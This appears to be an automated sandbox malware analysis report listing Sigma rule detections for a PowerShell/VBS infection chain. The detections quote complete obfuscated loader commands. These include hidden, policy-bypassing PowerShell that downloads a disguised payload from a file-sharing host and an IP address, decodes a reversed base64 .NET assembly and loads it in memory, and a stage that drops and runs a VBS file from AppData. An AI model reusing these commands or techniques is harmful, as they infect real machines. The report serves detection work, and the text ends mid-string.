$verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Sigma detected: Potential PowerShell Command Line Obfuscation
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Sigma detected: Potentially Suspicious PowerShell Child Processes
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , ProcessId: 7552, ProcessName: wscript.exe
                    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydw
                    Sigma detected: Suspicious MSHTA Child Process
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", CommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICA
                    Sigma detected: Suspicious PowerShell Parameter Substring
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT, CommandLine|base64offset|contains: L, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT, ProcessId: 4220, ProcessName: powershell.exe
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIk